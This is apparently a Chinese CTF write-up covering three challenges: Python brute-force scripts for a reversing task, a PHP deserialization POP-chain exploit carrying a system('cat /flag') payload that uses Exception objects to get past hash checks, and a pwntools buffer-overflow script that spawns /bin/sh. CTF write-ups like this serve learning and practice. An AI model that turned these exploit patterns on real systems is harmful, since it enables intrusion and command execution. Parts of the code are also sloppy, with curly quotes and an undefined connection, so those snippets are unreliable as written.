RE:ser_leak
题目是原题:
x1-x5:
def func2(x):
if x == 0:
return 0
return (x % 2) + func2(x // 2)
def func3(x):
return x % 2
def func1(N, L, R):
if L == R:
return L
mid = (L + R + 1) // 2
if N < mid * mid:
return func1(N, L, mid - 1)
else:
return func1(N, mid, R)
def _func1(x):
return func1(x, 1, x)
if __name__ == '__main__':
x1_flag = False
x2_flag = False
x3_flag = False
x4_flag = False
x5_flag = False
for i in range(10000000, 100000000):
if func3(func2(i)) != 1:
continue
if _func1(i) == 963 and not x1_flag:
print("x1:",i)
x1_flag = True
if _func1(i) == 4396 and not x2_flag:
print("x2:",i)
x2_flag = True
if _func1(i) == 6666 and not x3_flag:
print("x3:",i)
x3_flag = True
if _func1(i) == 1999 and not x4_flag:
print("x4:",i)
x4_flag = True
if _func1(i) == 3141 and not x5_flag:
print("x5:",i)
x5_flag = True
x6
def nextm(n, m):
if m*m <= n:
return m+1
else:
return 0
def nextn(n, m):
return (n % m != 0) * n
def test(n, m):
if n == 0:
return 0
if m == 0:
return 1
return test(nextn(n, m), nextm(n, m))
def func4(x):
if x == 1:
return 0
if x == 2:
return 1
return test(x, 2)
if __name__ == '__main__':
x6 = 0
for i in range(1, 5):
if func4(i*2-1) == 1:
x6 += 1
print(x6)
WEB:杰克与肉丝
考点:
1、php反序列化pop链构造
2、Exception类绕过md5、sha1
参考
https://blog.csdn.net/LYJ20010728/article/details/114493052
代码:
<?php
class Titanic{
public $people;
public $ship;
function __construct(){
$this->people = new Jack();
$this->ship = new Love();
}
}
class Jack{
private $action;
function __set($a, $b)
{
$b->$a();
}
}
class Love {
public $var;
function __construct(){
$this->var = new Rose();
}
}
class Rose {
public $var1,$var2;
public function __construct(){
$cmd ='system("cat /flag");?>';
$a = new Exception($cmd);$b = new Exception($cmd,1);
$this->var1 = $a;
$this->var2 = $b;
}
}
$f = new Titanic();
echo urlencode(serialize($f));
PWN:cover
把那个地址写在buf里面溢出到v5的位置 fastcall函数调用, 执行/bin / sh.
exp如下:
from pwn import *
context.log_level = ‘debug’
#p = process("./pwn")
#p = remote(" 118.190.62.234",12435)
p.recv()
p.send(p32(0x80484D2)+b’\x24’)
p.recv()
p.send(‘/bin/sh’)
p.interactive()